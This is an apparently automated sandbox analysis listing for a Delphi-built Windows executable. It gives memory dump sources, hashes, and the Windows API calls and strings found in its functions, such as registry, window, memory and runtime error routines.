                                                                            • Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e
                                                                            • Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b
                                                                            • Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                            • GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229
                                                                            • Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32 ref: 0040CFBA
                                                                            • GetSystemMetrics.USER32 ref: 0040D00D
                                                                            • GetSystemMetrics.USER32 ref: 0040D01C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$LocaleThread
                                                                            • String ID:
                                                                            • API String ID: 2159509485-0
                                                                            • Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29
                                                                            • Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF
                                                                            Strings
                                                                            • 48B , xrefs: 00423D0D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: 48B
                                                                            • API String ID: 3660427363-1399719961
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06
                                                                            Strings
                                                                            • MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: MS Shell Dlg 2
                                                                            • API String ID: 3660427363-3198668166
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadCursorA.USER32 ref: 004547A1
                                                                            • LoadCursorA.USER32 ref: 004547D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999
                                                                            • RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseFlush
                                                                            • String ID:
                                                                            • API String ID: 320916635-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 0040734B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 004073A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A
                                                                              • Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                              • Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50
                                                                            • Instruction ID: 48f25c4fc7afed193c39a16cc91a0304f94a1296cd048c63733264e3b5f0309e
                                                                            • Opcode Fuzzy Hash: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50
                                                                            • Instruction Fuzzy Hash: D2D0C932100108AFDB018E94AC018677B69EB48210B148815FD0485221D633E831AA91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69199861d6733e8cfdb95971abb33fd6c2e1878ae5676377f49553d2643ae0b4
                                                                            • Instruction ID: 91d624f7da0d7c4e4874d32eb18baa6d87edd49ebcf2bb7b71a7ea9e29257e8c
                                                                            • Opcode Fuzzy Hash: 69199861d6733e8cfdb95971abb33fd6c2e1878ae5676377f49553d2643ae0b4
                                                                            • Instruction Fuzzy Hash: 7CE0ECB04016C1CAC740DF64A844204BAE0B74430AF90527FC408E6275F3F846488B4E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 00434584
                                                                            • RestoreDC.GDI32(?,?), ref: 004345F8
                                                                            • GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672
                                                                            • SaveDC.GDI32(?), ref: 004346A9
                                                                            • RestoreDC.GDI32(?,?), ref: 00434716
                                                                            • DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA
                                                                            Strings
                                                                            • PSC , xrefs: 00434562, 0043468A

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A3D6

                                                                            APIs
                                                                            • GetLocalTime.KERNEL32 ref: 0040A3A0

                                                                            APIs
                                                                            • GetWindowLongA.USER32 ref: 0042E263
                                                                            • GetWindowRect.USER32 ref: 0042E27E
                                                                            • OffsetRect.USER32(?,?,?), ref: 0042E293
                                                                            • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1
                                                                            • GetWindowLongA.USER32 ref: 0042E2D2
                                                                            • GetSystemMetrics.USER32 ref: 0042E2E7
                                                                            • GetSystemMetrics.USER32 ref: 0042E2F0
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0042E32C
                                                                            • FillRect.USER32 ref: 0042E33A
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F
                                                                            • ReleaseDC.USER32 ref: 0042E39D

                                                                            APIs
                                                                            • MessageBoxA.USER32 ref: 004029CA
                                                                            Strings
                                                                            • 7 , xrefs: 0040279D
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • Unknown , xrefs: 00402888
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            • String , xrefs: 0040289D
                                                                            • bytes: , xrefs: 00402859
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C

                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004403EB
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F
                                                                            • ReleaseDC.USER32 ref: 0044041A
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00440421
                                                                            • SelectObject.GDI32(00000000,?), ref: 00440431
                                                                            • BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF
                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0
                                                                            • SelectObject.GDI32(00000000,?), ref: 004404DA
                                                                            • DeleteDC.GDI32(00000000), ref: 004404E3
                                                                            • DeleteObject.GDI32(?), ref: 004404EC
                                                                              • Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3
                                                                              • Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01

                                                                            APIs
                                                                              • Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28
                                                                              • Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE
                                                                            • CharToOemA.USER32 ref: 0040C08B
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8
                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE
                                                                            • GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3
                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9
                                                                            • LoadStringA.USER32 ref: 0040C0EB
                                                                            • MessageBoxA.USER32 ref: 0040C101
                                                                            Strings
                                                                            • ,v@ , xrefs: 0040C0D7
                                                                            • L0F , xrefs: 0040C068

                                                                            Strings
                                                                            • 7 , xrefs: 0040279D
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            • bytes: , xrefs: 00402859
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                            • API String ID: 0-2723507874
                                                                            • Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770
                                                                            • Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A65F
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A679
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6A7
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6BD
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6F5
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A70D
                                                                              • Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21
                                                                            • MulDiv.KERNEL32(?), ref: 0043A764
                                                                            • MulDiv.KERNEL32(?), ref: 0043A78E
                                                                            • MulDiv.KERNEL32(00000000), ref: 0043A7B4
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d
                                                                            • Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00420497
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004204A6
                                                                              • Part of subcall function 00420464: ResetEvent.KERNEL32(00000260,004204E1,?,?,00000000), ref: 0042046A
                                                                            • EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB
                                                                            • InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507
                                                                            • LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560
                                                                            • EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF
                                                                            Strings
                                                                            • 40F , xrefs: 0042049C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                            • String ID: 40F
                                                                            • API String ID: 2189153385-2631550472
                                                                            • Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6
                                                                            • Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB
                                                                            • GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610
                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616
                                                                            • MessageBoxA.USER32 ref: 00404634
                                                                            Strings
                                                                            • Error , xrefs: 00404628
